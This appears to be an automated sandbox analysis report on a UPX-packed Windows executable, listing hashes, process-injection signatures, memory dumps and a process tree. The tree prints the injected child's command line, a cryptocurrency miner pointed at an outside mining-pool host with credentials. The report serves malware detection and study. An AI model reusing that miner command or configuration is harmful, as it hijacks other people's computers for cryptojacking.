a63116967e732956dbbdf760f4c4d291c50184ce21dadb234e194ac1c2e864c4

Analysis

max time kernel
146s
max time network
120s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
31-12-2023 00:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

223481b2716424c55b698a70a7723430.exe
Size

402KB
MD5

223481b2716424c55b698a70a7723430
SHA1

1757166b18b10d1682bc39f4b34a91e02a6dc86d
SHA256

a63116967e732956dbbdf760f4c4d291c50184ce21dadb234e194ac1c2e864c4
SHA512

01daef8e2cd4d52262ec291c1a0abb0362d110b4258f8c3ecd509fef1c47c7cb149bb551a0853a87966b8b488dd6188c8d2d46bf27417c0026fe7bf3d1c7f8ad
SSDEEP

6144:VNKh6l6kPy+PuZkHrsWcmlH72R6GIwNc8FE1O9HGpBgU3E7ju:V4Yba+PdrsWlHSRwIEKkgG

Score

7^/10

upx

Malware Config

Signatures

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1276-0-0x0000000000400000-0x000000000052B000-memory.dmp	upx
behavioral1/memory/1276-6-0x0000000000400000-0x000000000052B000-memory.dmp	upx

Suspicious use of SetThreadContext 2 IoCs

Processes:

223481b2716424c55b698a70a7723430.exe223481b2716424c55b698a70a7723430.exe

description	pid	process	target process
PID 1276 set thread context of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 set thread context of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

223481b2716424c55b698a70a7723430.exe

pid process

1276 223481b2716424c55b698a70a7723430.exe

pid	process
1276	223481b2716424c55b698a70a7723430.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

223481b2716424c55b698a70a7723430.exe223481b2716424c55b698a70a7723430.exe

C:\Users\Admin\AppData\Local\Temp\223481b2716424c55b698a70a7723430.exe
"C:\Users\Admin\AppData\Local\Temp\223481b2716424c55b698a70a7723430.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1276
- C:\Users\Admin\AppData\Local\Temp\223481b2716424c55b698a70a7723430.exe
  "C:\Users\Admin\AppData\Local\Temp\223481b2716424c55b698a70a7723430.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Users\Admin\AppData\Local\Temp\223481b2716424c55b698a70a7723430.exe
    mine.exe -a 59 -o http://hdzx.aquarium-stakany.org:8332/ -u darkSons_crypt -p pt
    3⤵
    PID:632

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/632-34-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-57-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-21-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-26-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-31-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/632-30-0x0000000001EC0000-0x0000000001F0B000-memory.dmp

Filesize
300KB

Download
memory/632-29-0x00000000003F0000-0x00000000003F5000-memory.dmp

Filesize
20KB

Download
memory/632-28-0x00000000005C0000-0x00000000005C2000-memory.dmp

Filesize
8KB

Download
memory/632-24-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-23-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-20-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-19-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-17-0x00000000004FD000-0x0000000000537000-memory.dmp

Filesize
232KB

Download
memory/632-16-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-15-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/632-12-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-8-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-37-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-45-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-49-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-63-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-10-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-36-0x0000000000400000-0x0000000000537000-memory.dmp

Filesize
1.2MB

Download
memory/632-59-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-35-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-18-0x00000000004FD000-0x0000000000537000-memory.dmp

Filesize
232KB

Download
memory/632-61-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-47-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-55-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-39-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-41-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-53-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-43-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/632-51-0x0000000000400000-0x00000000005368DA-memory.dmp

Filesize
1.2MB

Download
memory/1276-5-0x0000000003260000-0x000000000338B000-memory.dmp

Filesize
1.2MB

Download
memory/1276-6-0x0000000000400000-0x000000000052B000-memory.dmp

Filesize
1.2MB

Download
memory/1276-0-0x0000000000400000-0x000000000052B000-memory.dmp

Filesize
1.2MB

Download
memory/2740-7-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-44-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-48-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-50-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-42-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-52-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-40-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-54-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-38-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-46-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-56-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-58-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-33-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-60-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-32-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-3-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download
memory/2740-62-0x0000000000400000-0x000000000043B000-memory.dmp

Filesize
236KB

Download

description	pid	process	target process
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 1276 wrote to memory of 2740	1276	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe
PID 2740 wrote to memory of 632	2740	223481b2716424c55b698a70a7723430.exe	223481b2716424c55b698a70a7723430.exe